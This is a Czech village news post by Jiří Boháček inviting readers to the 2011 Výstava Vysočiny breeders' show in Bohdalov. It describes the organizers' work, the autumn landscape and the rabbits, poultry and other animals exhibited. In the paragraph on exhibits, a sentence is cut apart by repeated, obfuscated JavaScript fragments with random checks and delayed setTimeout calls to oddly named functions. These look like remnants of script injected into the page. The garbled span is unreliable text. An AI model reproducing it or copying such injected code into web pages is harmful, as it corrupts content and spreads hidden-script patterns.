Bohdalov, bohdalov, aktuality, výstava, vysočiny
Rainbow page separator

Pozvánka na Výstavu Vysočiny 1.-2.10.2011

Sobota, 24. Září 2011

Výstava Vysočiny Bohdalov

vystava-vysociny-bohdalov-2Bohdalov /Dovolte, abych Vás všechny jménem naší Základní organizace pozval k návštěvě naší Výstavy Vysočiny. Záměrně píši ,,naší”, protože i já mám to privilegium podílet se na její organizaci.

V letošním roce se již po třicáté první bohdalovští chovatelé pustí do stejného kolotoče: navážení klecí a podlážek, úklid všech výstavních prostor, stavění klecí podle přesně vyměřených plánků, seno, sláma, bedny krmítek a pytle zrní jsou v mžiku na svém místě a čekají na prvního vystavovatele. Tohle všechno ale vystavovatelé a návštěvníci nevidí, takhle mohou naši výstavu vidět především místní obyvatelé, z nichž většina sdílí nadšení bohdalovských chovatelů a výstavu podporuje nebo se také sami do její přípravy zapojují.

vystava-vysociny-bohdalov-1Když se však podíváme ještě blíž, uvidíme výsledky úsilí, které není vidět. Hodiny (v hlavní návštěvní době i celé dny) práce u počítače, stovky provolaných minut organizátorů snažících se získat partnery a sponzory pro výstavu,vymýšlení nových a originálních způsobů reklamy a zviditelnění výstavy (internet, billboardy, rozhovory v rádiu…), doprovodný program a zajištění možností parkování přibývajících aut a autobusů. Toto vše zajistit stojí námahu po celý rok, ne jen několik měsíců před samotnou akcí. Výsledkem této spousty práce je pak velká výstava na solidní úrovni, která hledá konkurenci mezi celorepublikovými akcemi.
Tyto všechny úkony zvládá překvapivě malý kolektiv zaměstnaných (nebo studujících) lidí, kteří toto všechno připravují ve svém soukromém volnu, a můžu bez obav říci, že organizaci zvládáme každým rokem lépe a rychleji, problémy jsou méně časté a spokojených návštěvníků i vystavovatelů stále přibývá.

vystava-vysociny-bohdalov-3Troufnu si poznamenat, že jedním z důvodů našeho úspěchu je vedle práce pořadatelů i ideální poloha uprostřed republiky, která přímo vybízí k setkání lidí z opačných konců České republiky, ale i řady zahraničních. Dálnice D1 je nedaleko a dva výjezdy zaručují rychlou a plynulou jízdu až na místo. Přírodu Vysočiny na podzim v hojném počtu navštěvují houbaři. Hluboké vlhké lesy jsou každoročně plné hub a ty lákají nejen místní obyvatele, ale také vzdálenější návštěvníky k procházce. Doma se pak můžeme pochlubit hříbky, růžovkami a václavkami, které rostou zrovna v době konání výstavy. Krajinu Vysočiny poznáte bezpečně podle nezaměnitelné mozaiky lesů, polí a rybníků. Lidská činnost zde jen jemně, citlivě a pomalu zasahuje do konceptu přírody, a tak zde můžeme najít krásné scenérie vrcholů Žďárských vrchů, prastaré stromy i tajemná zákoutí skal. Jedním z nejkrásnějších období pro návštěvu Vysočiny je podzim, kdy se stromy zbarvují do sytě rudých barev a o slovo se pomalu hlásí zima.

vystava-vysociny-bohdalov-4Ani na samotném výstavišti se ale nudit nebudete. Hlavními vystavenými zvířaty jsou králíci, drůbež, holubi, ovce a kozy. Již tradičně jsou pro potěchu oka připraveny ukázkové expozice z nejrůznějších chovatelských odborností: okrasné ptactvo, nutrie, terarijní zvířata. Chybět nebude speciální výstava sebritek v chovatelském areálu Základní organizace a mnoho dalších zvířat. Standom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andardem je bohatá tombola a zajímavý doprovodný program pro děti i dospělé. V pátek navíc mají třídy ze škol a školek možnost si výstavu prohlédnout zdarma. V letošním roce součástí výstavy budou také Farmářské trhy, na kterých najdou návštěvníci mnoho kvalitních a zdravých potravin, např. maso, sýry, med, zeleninu atd. nebo i řadu výrobků.

vystava-vysociny-bohdalov-5I Vy můžete o prvním říjnovém víkendu posoudit, jak se nám výstava, letos již patnáctá konaná v okolí kulturního domu, zdařila, jaká byla nabídka prodejních zvířat a jak se nám povedlo akci zvládnout. Třeba si zrovna vaše zvířata zaslouží nějakou tu čestnou cenu nebo snad i vyšší ocenění. A bude-li nám přát počasí, věřím, že si letošní Výstavu Vysočiny užijeme. A vy také.

Připravil: Jiří Boháček